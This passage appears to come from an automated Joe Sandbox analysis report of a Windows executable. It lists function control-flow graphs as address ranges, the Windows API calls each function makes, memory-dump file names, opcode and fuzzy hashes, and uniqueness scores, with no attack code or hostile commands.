                                                                                                                                                                                                                                                              control_flow_graph 449 408d43-408d4a 450 408d50-408d9a 449->450 451 4090fc-409123 449->451 452 408dbc 450->452 453 408d9c-408dba 450->453 454 409709-40971c 451->454 455 408dc6-408dcd 452->455 453->455 456 40973d-409755 454->456 457 40971e-40973b 454->457 458 408dd3-408e00 455->458 459 408fe5 455->459 460 409758-40975e 456->460 457->460 462 408e06-408e45 458->462 461 408fef-409018 459->461 463 409760-409766 460->463 464 40976b-409772 460->464 466 40901a-40902d 461->466 467 40902f-409047 461->467 470 408e72-408e97 462->470 471 408e47-408e70 462->471 472 409b06 463->472 473 408a9f 463->473 468 4099a6-4099ab 464->468 469 409778-4097a4 464->469 476 40904d-409053 466->476 467->476 475 4099b2-409b04 468->475 469->463 474 408e9d-408ea3 470->474 471->474 481 409b09-409b10 472->481 477 408cf5-408cfb 473->477 478 408aa6-408aad 473->478 479 408be7-408bed 473->479 480 408ce7-408cee 473->480 482 408ee2-408eee 474->482 483 408ea5-408eac 474->483 475->481 484 409055-40905c 476->484 485 40908e-409098 476->485 495 408d07-408d3e 477->495 478->475 486 408ab3-408ad1 478->486 497 408bf4-408c01 479->497 489 408cf0 480->489 490 408cab-408cd9 480->490 491 408ef4-408efe 482->491 492 408fae-408fb8 482->492 487 409962-409967 483->487 488 408eb2-408edc 483->488 493 409970-409975 484->493 494 409062-409088 484->494 485->461 496 40909e-4090a4 485->496 486->472 498 408ad7-408b42 486->498 487->475 488->482 499 40995b-409960 489->499 503 408cdb-408ce1 490->503 504 408cfd 490->504 500 408f04-408f2d 491->500 501 408fca-408fe0 491->501 492->462 507 408fbe-408fc4 492->507 493->475 494->485 495->454 502 4090aa-4090b1 496->502 505 409954-409959 497->505 506 408c07-408c2c 497->506 508 408b44-408b4b 498->508 509 408b96-408ba9 498->509 499->475 510 408f8c-408fac 500->510 511 408f2f-408f3f 500->511 501->502 512 409977-40997c 502->512 513 4090b7-4096f4 502->513 503->480 504->495 505->475 505->499 506->497 514 408c2e-408c3a 506->514 507->501 515 408b69-408b90 GlobalAlloc 508->515 516 408b4d-408b63 GlobalFree 508->516 517 408baf-408bb4 509->517 518 408f42-408f48 510->518 511->518 512->475 513->473 520 408c88-408ca9 514->520 521 408c3c-408c43 514->521 515->472 515->509 516->515 522 408bc1-408be1 517->522 523 408bb6-408bbf 517->523 518->491 524 408f4a-408f51 518->524 520->503 525 408c55-408c76 GlobalAlloc 521->525 526 408c45-408c54 GlobalFree 521->526 522->479 523->517 528 408f57-408f87 524->528 529 409969-40996e 524->529 525->472 527 408c7c-408c82 525->527 526->525 527->520 528->491 529->475
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004093BF Relevance: 5.4, APIs: 4, Instructions: 399COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 530 4093bf-4093c6 531 409632 530->531 532 4093cc-409404 530->532 535 409638-409646 531->535 533 409436-40944f 532->533 534 409406-409431 532->534 537 409457-40945e 533->537 536 4094fb-409519 534->536 541 409993-40999d 535->541 542 40964c-409658 535->542 543 409527-409533 536->543 539 409460-409474 537->539 540 4094ca-4094f5 537->540 546 409483-409489 539->546 547 409476-40947c 539->547 540->536 550 4099b2-409b04 541->550 548 409b06 542->548 549 40965e-40966b 542->549 544 409624-409630 543->544 545 409539-409569 543->545 544->535 551 4095da-40961f 545->551 552 40956b-409588 545->552 555 409451 546->555 556 40948b-409492 546->556 547->546 553 409b09-409b10 548->553 554 409671-409678 549->554 550->553 557 40958e-409594 551->557 552->557 558 40967e-4096ed 554->558 559 40999f-4099a4 554->559 555->537 560 409985-40998a 556->560 561 409498-4094c8 556->561 562 409596-40959d 557->562 563 40951b-409521 557->563 558->554 564 4096ef-4096f4 558->564 559->550 560->550 561->555 565 4095a3-4095d5 562->565 566 40998c-409991 562->566 563->543 567 408a9f 564->567 565->563 566->550 568 408cf5-408cfb 567->568 569 408aa6-408aad 567->569 570 408be7-408bed 567->570 571 408ce7-408cee 567->571 575 408d07-40971c 568->575 569->550 572 408ab3-408ad1 569->572 576 408bf4-408c01 570->576 573 408cf0 571->573 574 408cab-408cd9 571->574 572->548 577 408ad7-408b42 572->577 578 40995b-409960 573->578 580 408cdb-408ce1 574->580 581 408cfd 574->581 586 40973d-409755 575->586 587 40971e-40973b 575->587 582 409954-409959 576->582 583 408c07-408c2c 576->583 584 408b44-408b4b 577->584 585 408b96-408ba9 577->585 578->550 580->571 581->575 582->550 582->578 583->576 588 408c2e-408c3a 583->588 589 408b69-408b90 GlobalAlloc 584->589 590 408b4d-408b63 GlobalFree 584->590 591 408baf-408bb4 585->591 592 409758-40975e 586->592 587->592 593 408c88-408ca9 588->593 594 408c3c-408c43 588->594 589->548 589->585 590->589 595 408bc1-408be1 591->595 596 408bb6-408bbf 591->596 597 409760-409766 592->597 598 40976b-409772 592->598 593->580 599 408c55-408c76 GlobalAlloc 594->599 600 408c45-408c54 GlobalFree 594->600 595->570 596->591 597->548 597->567 603 4099a6-4099ab 598->603 604 409778-4097a4 598->604 599->548 602 408c7c-408c82 599->602 600->599 602->593 603->550 604->597
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040893D Relevance: 5.4, APIs: 4, Instructions: 351memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 605 40893d-408965 606 409b09-409b10 605->606 607 40896b-408a94 605->607 608 408a96-408a99 607->608 609 409b06 608->609 610 408a9f 608->610 609->606 611 408cf5-408cfb 610->611 612 408aa6-408aad 610->612 613 408be7-408bed 610->613 614 408ce7-408cee 610->614 619 408d07-40971c 611->619 615 4099b2-409b04 612->615 616 408ab3-408ad1 612->616 620 408bf4-408c01 613->620 617 408cf0 614->617 618 408cab-408cd9 614->618 615->606 616->609 621 408ad7-408b42 616->621 622 40995b-409960 617->622 624 408cdb-408ce1 618->624 625 408cfd 618->625 630 40973d-409755 619->630 631 40971e-40973b 619->631 626 409954-409959 620->626 627 408c07-408c2c 620->627 628 408b44-408b4b 621->628 629 408b96-408ba9 621->629 622->615 624->614 625->619 626->615 626->622 627->620 632 408c2e-408c3a 627->632 633 408b69-408b90 GlobalAlloc 628->633 634 408b4d-408b63 GlobalFree 628->634 635 408baf-408bb4 629->635 636 409758-40975e 630->636 631->636 637 408c88-408ca9 632->637 638 408c3c-408c43 632->638 633->609 633->629 634->633 639 408bc1-408be1 635->639 640 408bb6-408bbf 635->640 641 409760-409766 636->641 642 40976b-409772 636->642 637->624 643 408c55-408c76 GlobalAlloc 638->643 644 408c45-408c54 GlobalFree 638->644 639->613 640->635 641->608 646 4099a6-4099ab 642->646 647 409778-4097a4 642->647 643->609 645 408c7c-408c82 643->645 644->643 645->637 646->615 647->641
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 648 401867-40187a call 401400 call 407935 653 40187c 648->653 654 401882-4018a3 call 4078a4 653->654 655 401905-40190c 653->655 665 4018a5-4018ac 654->665 666 4018c6-4018c9 call 40774b 654->666 656 401942-403672 655->656 657 40190e-40193d call 40163b call 407cb6 SetCurrentDirectoryA 655->657 663 403677-403678 656->663 664 403672 call 40163b 656->664 669 403831-403842 657->669 663->669 664->663 665->666 667 4018ae-4018b5 call 4082eb 665->667 674 4018ce-4018d1 666->674 667->666 679 4018b7-4018c2 call 4076b0 667->679 677 4018f0-4018fd 674->677 678 4018d3-4018d8 674->678 677->653 680 4018da-4018db 678->680 681 4018dd-4018ed GetFileAttributesA 678->681 684 401902 679->684 685 4018c4 679->685 680->677 681->677 684->655 685->678
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,00000000), ref: 00401930
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE ref: 004018E0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                                                              • API String ID: 15404496-2967466578
                                                                                                                                                                                                                                                              • Opcode ID: 7ec56cc13be85b71885b1f375ed3d68621edb629c5c8f0e55e5907d8a4b65275
                                                                                                                                                                                                                                                              • Instruction ID: 7c957a27ca0a3a4d120e040fbf36ba75badf21027d0793a9ff2a0c4399bfdea5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ec56cc13be85b71885b1f375ed3d68621edb629c5c8f0e55e5907d8a4b65275
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C62174B19087419ED7107F2A8C4476ABBE8AF41315F15887FE4C5A33E2D63D8581CB6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403845 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 686 403845-403851 687 403854-403856 686->687 688 4038f0-4038f2 687->688 689 40385c-403868 687->689 690 4038f9-403900 688->690 689->688 691 40386e-403871 call 40165a 689->691 693 403876-40387c 691->693 694 4038f4 693->694 695 40387e-403889 call 40161a 693->695 694->690 698 403895-40389a 695->698 699 40388b-403893 695->699 700 40389c-40389e 698->700 699->700 701 4038a0-4038e6 MulDiv SendMessageA 700->701 702 4038e9-4038eb 700->702 701->702 702->687
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                                                                              • API String ID: 3850602802-3203441087
                                                                                                                                                                                                                                                              • Opcode ID: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                                                                                                                                                              • Instruction ID: 587040a18b5e8d3ddabbac84dae9583a5ca4581ff6aa0f06bd791ecb2da4f76d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2811B172A043009FC710BF29D88911BBFE8EB40351F50C67EF854A73A0E338D6058B99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407AD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 703 407ad4-407ae5 704 407ae8-407ae9 703->704 705 407b2b-407b2e 704->705 706 407aeb-407b25 GetTickCount GetTempFileNameA 704->706 708 407b30-407b37 705->708 706->704 707 407b27-407b29 706->707 707->708
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                              • Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                                                                                                                                                              • Instruction ID: 856d399887dd27b7ff2090b6ba205bffd5fa5b63c1769944cd833ed7d7811f75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004097A6 Relevance: 5.3, APIs: 4, Instructions: 284COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 709 4097a6-4097ad 710 4097d0-4097e3 709->710 711 4097af-4097ce 709->711 712 409810-40985c 710->712 713 409709-40971c 710->713 711->712 719 409866-40986d 712->719 715 40973d-409755 713->715 716 40971e-40973b 713->716 718 409758-40975e 715->718 716->718 720 409760-409766 718->720 721 40976b-409772 718->721 723 409873-40989a 719->723 724 409917-409932 719->724 727 409b06 720->727 728 408a9f 720->728 725 4099a6-4099ab 721->725 726 409778-4097a4 721->726 730 4098f5-409915 723->730 731 40989c-4098a8 723->731 738 4099ad 724->738 729 4099b2-409b04 725->729 726->720 736 409b09-409b10 727->736 732 408cf5-408cfb 728->732 733 408aa6-408aad 728->733 734 408be7-408bed 728->734 735 408ce7-408cee 728->735 729->736 737 4098ab-4098b1 730->737 731->737 744 408d07-408d3e 732->744 733->729 741 408ab3-408ad1 733->741 745 408bf4-408c01 734->745 742 408cf0 735->742 743 408cab-408cd9 735->743 739 4098b3-4098ba 737->739 740 40985e-409864 737->740 738->729 739->738 746 4098c0-4098f0 739->746 740->719 741->727 747 408ad7-408b42 741->747 748 40995b-409960 742->748 749 408cdb-408ce1 743->749 750 408cfd 743->750 744->713 751 409954-409959 745->751 752 408c07-408c2c 745->752 746->740 753 408b44-408b4b 747->753 754 408b96-408ba9 747->754 748->729 749->735 750->744 751->729 751->748 752->745 755 408c2e-408c3a 752->755 756 408b69-408b90 GlobalAlloc 753->756 757 408b4d-408b63 GlobalFree 753->757 758 408baf-408bb4 754->758 759 408c88-408ca9 755->759 760 408c3c-408c43 755->760 756->727 756->754 757->756 761 408bc1-408be1 758->761 762 408bb6-408bbf 758->762 759->749 763 408c55-408c76 GlobalAlloc 760->763 764 408c45-408c54 GlobalFree 760->764 761->734 762->758 763->727 765 408c7c-408c82 763->765 764->763 765->759
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                                              • Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409302 Relevance: 5.3, APIs: 4, Instructions: 276COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
